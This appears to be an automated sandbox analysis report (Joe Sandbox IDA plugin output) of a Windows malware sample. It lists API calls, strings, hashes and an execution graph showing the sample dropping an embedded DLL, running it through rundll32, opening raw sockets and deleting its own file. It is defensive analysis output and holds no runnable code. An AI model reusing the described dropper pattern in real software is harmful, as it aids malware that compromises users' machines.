                                                        Function 00401D6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401D74
                                                        • #324.MFC42(00000064,00000000), ref: 00401D85
                                                        • #540.MFC42(00000064,00000000), ref: 00401D93
                                                        • #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #324#540#860H_prolog
                                                        • String ID: RedTom21@HotMail.com
                                                        • API String ID: 1715175771-4020391281
                                                        • Opcode ID: 2e6038b0c2a3161042f3a77bc08ef84b8c52d66f33703c1b03fec492057627b6
                                                        • Instruction ID: 78d62cf22874564550b960a1e2f1980c8c55d506c68ef3259133a31bc2e11175
                                                        • Opcode Fuzzy Hash: 2e6038b0c2a3161042f3a77bc08ef84b8c52d66f33703c1b03fec492057627b6
                                                        • Instruction Fuzzy Hash: 9FE06571B403509BD714AB99C50A79EB6A9EF91714F10447FA902773C1C7FC6E009699
                                                        Function 004024DF Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004024F1
                                                        • _ftol.MSVCRT ref: 00402517
                                                        • _ftol.MSVCRT ref: 00402525
                                                        • #4299.MFC42(0000000F,00000041,?,?,00000001), ref: 00402549
                                                        • #4299.MFC42(0000000F,?,?,000000F1,00000001), ref: 0040256B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #4299_ftol$ClientRect
                                                        • String ID:
                                                        • API String ID: 3171108694-0
                                                        • Opcode ID: 5b5269a8b2c3e4b0ac480d2bf8ec9612011b5aad8df481b47eb0e60a219a1807
                                                        • Instruction ID: 3880c801f612beb6246e745b78d7e2d3a19b48e5053d162d2e00decfba834721
                                                        • Opcode Fuzzy Hash: 5b5269a8b2c3e4b0ac480d2bf8ec9612011b5aad8df481b47eb0e60a219a1807
                                                        • Instruction Fuzzy Hash: C51151B1A00209BFDB10DBA9DE59BAEB778FF40744F10027AF501B61E5D7B49D40DA28
                                                        Function 004020DA Relevance: 7.5, APIs: 5, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004020DF
                                                        • #2379.MFC42 ref: 00402125
                                                          • Part of subcall function 00401D6F: _EH_prolog.MSVCRT ref: 00401D74
                                                          • Part of subcall function 00401D6F: #324.MFC42(00000064,00000000), ref: 00401D85
                                                          • Part of subcall function 00401D6F: #540.MFC42(00000064,00000000), ref: 00401D93
                                                          • Part of subcall function 00401D6F: #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        • #2514.MFC42 ref: 00402103
                                                        • #800.MFC42 ref: 00402112
                                                        • #641.MFC42 ref: 0040211E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$#2379#2514#324#540#641#800#860
                                                        • String ID:
                                                        • API String ID: 1337987987-0
                                                        • Opcode ID: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction ID: 0c37060d93abf7ffef3ab529cf96d0046ab1b8bea522c7ef1cdfd7726eb284c9
                                                        • Opcode Fuzzy Hash: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction Fuzzy Hash: 09F0FE71810518DADB25EFA5C65A7ACB730BF20314F60417FA412761D2DBBC5A09CA59
                                                        Function 004010A8 Relevance: 7.5, APIs: 5, Instructions: 23COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #656$#641H_prolog
                                                        • String ID:
                                                        • API String ID: 2321568657-0
                                                        • Opcode ID: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction ID: e680012da702e7b92035de08c4d7561f67a84a50463a6348afc1be6ddfe969e7
                                                        • Opcode Fuzzy Hash: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction Fuzzy Hash: 5DF03071915654DADB2CEBA5CA197DDBBA4BF04318F00456FE066732C2CBF81B08C755
                                                        Function 004015CD Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #2379.MFC42 ref: 004015D2
                                                        • #4299.MFC42(00000000,00000000,00000028,?,00000001), ref: 00401602
                                                        • #4299.MFC42(00000032,00000000,0000012C,?,00000001), ref: 00401624
                                                        • #4299.MFC42(00000168,00000000,00000000,?,00000001), ref: 00401645
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #4299$#2379
                                                        • String ID:
                                                        • API String ID: 453929936-0
                                                        • Opcode ID: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction ID: 396461380f4f282afe083d313e8dd4ae14482c7760a999395c5db5fab6d4a27c
                                                        • Opcode Fuzzy Hash: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction Fuzzy Hash: AF01B131240700ABD5318A59CC81FABB3AAAFC4B05F280E2FF183391D1D7BB8841C619
                                                        Function 00401CEC Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #609#641#693H_prolog
                                                        • String ID:
                                                        • API String ID: 432028610-0
                                                        • Opcode ID: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction ID: c1b141184ca5cae31352d23a373f4eac66a41ce64f7327093406d0e5d71bec99
                                                        • Opcode Fuzzy Hash: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction Fuzzy Hash: F3F0A070920664DACB18FBA4C6193DDBBB8AF14308F00466FA062732C2CBF81B04C795

                                                        Execution Graph

                                                        Execution Coverage:12%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:1.5%
                                                        Total number of Nodes:275
                                                        Total number of Limit Nodes:5
                                                        execution_graph 784 401d42 789 401d4c 784->789 795 402b0b 789->795 792 402ec2 799 402e96 792->799 794 401d63 796 401d47 795->796 797 402b1f 795->797 796->792 798 402b5a 3 API calls 797->798 798->796 800 402eab __dllonexit 799->800 801 402e9f _onexit 799->801 800->794 801->794 929 401ec3 930 401cec ctype 7 API calls 929->930 931 401ecb 930->931 932 401ed2 #825 931->932 933 401ed9 931->933 932->933 802 403244 805 4025eb #825 802->805 804 40324c 805->804 863 401704 868 401720 863->868 869 402dd4 #815 868->869 806 401145 #6453 807 401157 DeleteObject 806->807 808 40115e 806->808 807->808 1007 402588 SendMessageA 1008 4025c4 1007->1008 1009 4025a4 #3286 1007->1009 1009->1008 1010 4025b4 1009->1010 1011 401160 22 API calls 1010->1011 1011->1008 809 401349 810 40140f 809->810 811 40135e SendMessageA SendMessageA SendMessageA 809->811 812 4013a5 SendMessageA SendMessageA SendMessageA 811->812 813 4013d9 811->813 812->813 813->810 814 4013df SendMessageA SendMessageA SendMessageA 813->814 814->810 934 4016c9 935 402b48 934->935 936 402b59 935->936 937 402baf WSACleanup 935->937 1012 40168a #656 1013 4016a0 1012->1013 1014 401699 #825 1012->1014 1014->1013 774 402b0b 775 402b26 774->775 776 402b1f 774->776 778 402b5a WSAStartup 776->778 779 402ba3 WSAGetLastError 778->779 780 402b7c 778->780 782 402b92 779->782 781 402b9d WSACleanup 780->781 780->782 781->779 782->775 1015 40108c 1020 4010a8 _EH_prolog #656 #656 #656 #641 1015->1020 1017 401094 1018 4010a2 1017->1018 1019 40109b #825 1017->1019 1019->1018 1020->1017 938 4015cd #2379 939 4015e6 938->939 940 401607 939->940 941 4015f8 #4299 939->941 942 401629 940->942 944 401616 #4299 940->944 941->940 943 40164a 942->943 945 401638 #4299 942->945 944->942 945->943 870 401e0f #2370 946 4025cf 951 402226 EnterCriticalSection SendMessageA 946->951 948 4025d7 958 401160 _EH_prolog #537 #537 #540 948->958 950 4025e9 952 402290 LeaveCriticalSection 951->952 953 402259 951->953 952->948 954 40225a #3286 953->954 955 40227c SendMessageA 954->955 956 40226c #825 #825 954->956 955->954 957 40228f 955->957 956->955 957->952 959 4011b4 #2818 958->959 960 4011ea #6199 #2614 958->960 961 4011da #939 959->961 962 4011cd #941 959->962 973 40120e 960->973 961->959 961->960 962->961 963 4012f8 #6199 #6199 #800 #800 #800 963->950 964 401233 #2818 965 401261 #939 964->965 966 401254 #941 964->966 968 401273 965->968 969 401295 #2818 965->969 966->965 967 4012cc #941 #941 967->973 968->969 971 40127e #2818 968->971 972 4012a5 #939 969->972 970 4012f5 970->963 971->972 972->973 973->963 973->964 973->967 973->970 815 401650 #4476 871 402614 #693 872 402623 #825 871->872 873 40262a 871->873 872->873 874 401f19 _EH_prolog #4710 GetSystemMenu #2863 875 401f95 SendMessageA SendMessageA #823 874->875 876 401f48 #540 #4160 874->876 879 401fe4 #2086 875->879 880 401fdc 875->880 877 401f87 #800 876->877 878 401f69 AppendMenuA AppendMenuA 876->878 877->875 878->877 883 4024df 5 API calls 879->883 885 401000 6 API calls 880->885 884 40200a 11 API calls 883->884 885->879 974 4020da _EH_prolog 975 4020f4 974->975 976 402125 #2379 974->976 980 401d6f _EH_prolog #324 #540 #860 975->980 977 40212a 976->977 979 4020fc #2514 #800 #641 979->977 980->979 981 4021da 982 402df8 #4853 981->982 783 4016df #561 __p___argv DeleteFileA 983 401edf #2302 #2302 984 4021df 985 402df2 #4376 984->985 1021 40229f _EH_prolog 1027 4028b1 1021->1027 1024 4023f2 #823 memcpy #6007 1026 402442 LeaveCriticalSection #800 1024->1026 1040 402883 1027->1040 1030 402acc sprintf sprintf sprintf 1032 4022fe 13 API calls 1030->1032 1031 40297d 1033 402a13 strcpy htons htons 1031->1033 1034 402986 1031->1034 1032->1024 1037 402a44 sprintf htonl 1033->1037 1035 4029b2 6 API calls 1034->1035 1036 40298b sprintf sprintf 1034->1036 1035->1032 1036->1032 1039 402a80 sprintf sprintf memcpy 1037->1039 1039->1032 1041 40288a strncpy inet_ntoa strncpy inet_ntoa strncpy 1040->1041 1041->1030 1041->1031 703 402f22 __set_app_type __p__fmode __p__commode 704 402f91 703->704 705 402fa5 704->705 706 402f99 __setusermatherr 704->706 715 403092 _controlfp 705->715 706->705 708 402faa _initterm __getmainargs _initterm 709 402ffe GetStartupInfoA 708->709 711 403032 GetModuleHandleA 709->711 716 4030ae #1576 711->716 714 403056 exit _XcptFilter 715->708 716->714 986 4021e4 #6453 988 4021fd 986->988 987 402226 7 API calls 989 402216 DeleteCriticalSection 987->989 988->987 892 401725 893 40172a 892->893 894 402ec2 2 API calls 893->894 895 401743 894->895 1042 4016a6 1047 4016b0 1042->1047 1045 402ec2 2 API calls 1046 4016c7 1045->1046 1048 402b0b 3 API calls 1047->1048 1049 4016ab 1048->1049 1049->1045 717 401c6a _EH_prolog #1134 729 401e2a _EH_prolog #324 #567 #567 717->729 719 401c92 __p___argv 720 401cb3 719->720 721 401cae 719->721 741 401a2d FindResourceA 720->741 732 401867 #823 memset __p___argv 721->732 725 401cc4 #2514 750 401cec _EH_prolog 725->750 726 401cbc ExitProcess 728 401cde 753 40265d 729->753 731 401e80 #1168 #1146 LoadIconA 731->719 754 4017b2 732->754 735 4018d5 762 40174f GetTickCount srand rand 735->762 736 4018b5 __p___argv 737 4017b2 5 API calls 736->737 739 4018c9 Sleep 737->739 739->735 739->736 742 401a52 LoadResource 741->742 744 401a60 741->744 743 401a67 SizeofResource LockResource memcpy 742->743 742->744 745 401a98 743->745 744->725 744->726 746 40174f 4 API calls 745->746 747 401b15 wsprintfA CreateDirectoryA Sleep memset 746->747 748 40174f 4 API calls 747->748 749 401b5d 7 API calls 748->749 749->744 768 402694 750->768 753->731 766 402ee0 754->766 757 4017fb 757->735 757->736 758 4017ff 759 401808 memset ReadFile 758->759 760 401856 CloseHandle 759->760 761 401837 memcpy 759->761 760->757 761->759 763 40178b 762->763 764 401794 rand 763->764 765 4017ab 17 API calls 763->765 764->764 764->765 767 4017bf CreateFileA 766->767 767->757 767->758 769 40284f 768->769 770 402873 769->770 771 40285d TerminateThread CloseHandle 769->771 772 401d0f #693 #609 #641 770->772 773 40287a closesocket 770->773 771->770 772->728 773->772 824 40246a #3092 825 4024b1 824->825 827 402483 824->827 841 40284f 825->841 832 40271c socket 827->832 829 4024cc 830 4024c5 #6199 830->829 831 4024a5 831->829 831->830 833 402742 gethostname 832->833 834 40280f WSAGetLastError 832->834 833->834 835 40275d gethostbyname htons memcpy bind 833->835 840 402846 834->840 835->834 836 4027ad setsockopt setsockopt 835->836 836->834 837 4027e2 WSAIoctl 836->837 837->834 838 402817 CreateThread 837->838 839 402831 closesocket 838->839 838->840 839->840 840->831 842 402873 841->842 843 40285d TerminateThread CloseHandle 841->843 844 402881 842->844 845 40287a closesocket 842->845 843->842 844->831 845->844 896 401a2a 897 401a2d FindResourceA 896->897 898 401a60 897->898 899 401a52 LoadResource 897->899 899->898 900 401a67 SizeofResource LockResource memcpy 899->900 904 401a98 900->904 901 40174f 4 API calls 902 401b15 wsprintfA CreateDirectoryA Sleep memset 901->902 903 40174f 4 API calls 902->903 905 401b5d 7 API calls 903->905 904->901 905->898 906 402b2c 911 402b48 906->911 908 402b34 909 402b42 908->909 910 402b3b #825 908->910 910->909 912 402b54 WSACleanup 911->912 913 402b59 911->913 912->908 913->908 990 4030ef 991 4030f4 990->991 994 4030c6 #1168 991->994 995 4030e0 _setmbcp 994->995 996 4030e9 994->996 995->996 1050 4026b0 1053 4026bd 1050->1053 1051 402711 1052 4026c8 recv 1052->1053 1054 4026e4 WSAGetLastError 1052->1054 1053->1051 1053->1052 1054->1051 1054->1053 846 401672 EnableWindow 847 403074 _exit 848 402575 #2379 851 4024df GetClientRect _ftol _ftol 848->851 852 402539 851->852 853 40254e 851->853 852->853 854 40253f #4299 852->854 855 402570 853->855 856 40255e #4299 853->856 854->853 856->855 857 402678 858 402694 ctype 3 API calls 857->858 859 402680 858->859 860 402687 #825 859->860 861 40268e 859->861 860->861 923 402138 IsIconic 924 4021c9 #2379 923->924 925 40214e 7 API calls 923->925 926 4021d0 924->926 925->926 1003 4025f8 #609 1004 402607 #825 1003->1004 1005 40260e 1003->1005 1004->1005 1006 4010fe #2302 #2302 #2302 1055 401dbe 1060 401dda _EH_prolog #800 #641 1055->1060 1057 401dc6 1058 401dd4 1057->1058 1059 401dcd #825 1057->1059 1059->1058 1060->1057 927 40243f 928 402442 LeaveCriticalSection #800 927->928

                                                        Executed Functions

                                                        Function 00401A2D Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 209filesleepprocessCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00401B38
                                                        • Sleep.KERNELBASE(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401B90
                                                        • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401BA2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00401BA9
                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00000104), ref: 00401BFA
                                                        • wsprintfA.USER32 ref: 00401C21
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401C5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFilewsprintf$CloseDirectoryFindHandleLoadLockModuleNameProcessSizeofSleepWritememcpymemset
                                                        • String ID: %s "%s",QueryPluginInterface %s$%s\%s.dll$D$IMAGE$c:\%s$c:\windows\system32\rundll32.exe
                                                        • API String ID: 729933531-2732814730
                                                        • Opcode ID: f367ddab212173f478f0c3d6209973ce2cd3006af243161d02f2b13398c8c083
                                                        • Instruction ID: 922f0755652aa06ef568071101b0f14043c98d7905c641deb23ee6d51d764bee
                                                        • Opcode Fuzzy Hash: f367ddab212173f478f0c3d6209973ce2cd3006af243161d02f2b13398c8c083
                                                        • Instruction Fuzzy Hash: F86193B2A00248BEDB119BF4CD45FDFBBBCAB89304F1044BAF345B6181DA749A458F65
                                                        Function 00402F22 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                        • String ID: `@
                                                        • API String ID: 801014965-3559765445
                                                        • Opcode ID: 554b2b36ebdbdca76e7e5890daf673f7ab6b653fcba5f1f76f6d923fca04a6ed
                                                        • Instruction ID: fd41096d9372b4dda24e723cd552983fee23a0ad75fa497c59ca918bbf17219f
                                                        • Opcode Fuzzy Hash: 554b2b36ebdbdca76e7e5890daf673f7ab6b653fcba5f1f76f6d923fca04a6ed
                                                        • Instruction Fuzzy Hash: 26418BB0941208AFDB209FA4D945AAA7BBCEB49711B20053FF942B72E5D67949408B28
                                                        Function 00401C6A Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401C6F
                                                        • #1134.MFC42(00000000), ref: 00401C7F
                                                          • Part of subcall function 00401E2A: _EH_prolog.MSVCRT ref: 00401E2F
                                                          • Part of subcall function 00401E2A: #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                          • Part of subcall function 00401E2A: #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                          • Part of subcall function 00401E2A: #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                          • Part of subcall function 00401E2A: LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        • __p___argv.MSVCRT ref: 00401C9F
                                                        • ExitProcess.KERNEL32 ref: 00401CBE
                                                          • Part of subcall function 00401867: #823.MFC42(00100000), ref: 00401879
                                                          • Part of subcall function 00401867: memset.MSVCRT ref: 00401888
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 00401867: Sleep.KERNEL32(00000064), ref: 004018CE
                                                          • Part of subcall function 00401867: GetTickCount.KERNEL32 ref: 00401906
                                                          • Part of subcall function 00401867: GetTempPathA.KERNEL32(00000104,?), ref: 00401936
                                                          • Part of subcall function 00401867: wsprintfA.USER32 ref: 00401953
                                                          • Part of subcall function 00401867: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                          • Part of subcall function 00401867: #823.MFC42(?), ref: 0040197F
                                                        • #2514.MFC42 ref: 00401CCA
                                                          • Part of subcall function 00401CEC: _EH_prolog.MSVCRT ref: 00401CF1
                                                          • Part of subcall function 00401CEC: #693.MFC42(?,?,00401CDE), ref: 00401D19
                                                          • Part of subcall function 00401CEC: #609.MFC42(?,?,00401CDE), ref: 00401D25
                                                          • Part of subcall function 00401CEC: #641.MFC42(?,?,00401CDE), ref: 00401D30
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: H_prolog__p___argv$#567#823$#1134#1146#1168#2514#324#609#641#693CountCreateExitFileIconLoadPathProcessSleepTempTickmemsetwsprintf
                                                        • String ID:
                                                        • API String ID: 4041608318-0
                                                        • Opcode ID: 76151f68726041c84d7ab328924840f8fb70c527e4686e21e076778c71525204
                                                        • Instruction ID: 6f737f08b995e68c62b9dff43b60cf904c1485ff509acee86472e34ce1649ac1
                                                        • Opcode Fuzzy Hash: 76151f68726041c84d7ab328924840f8fb70c527e4686e21e076778c71525204
                                                        • Instruction Fuzzy Hash: 17016D319511158BEB14FB65C90A7DCB7B4AF08328F0042BAA465B21E1EF789A45CA58
                                                        Function 00401A2A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00401B38
                                                        • Sleep.KERNELBASE(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: Resource$wsprintf$CreateDirectoryFindLoadLockSizeofSleepmemcpymemset
                                                        • String ID: IMAGE
                                                        • API String ID: 3931793037-845793007
                                                        • Opcode ID: d3edc049732555914adbff52832aa4292bf647af716a8d02043898333d2fcd6f
                                                        • Instruction ID: 4f975884327954dfad89ea398a43f93018ff4a6e72412e49f1d32c0e5fd34b6a
                                                        • Opcode Fuzzy Hash: d3edc049732555914adbff52832aa4292bf647af716a8d02043898333d2fcd6f
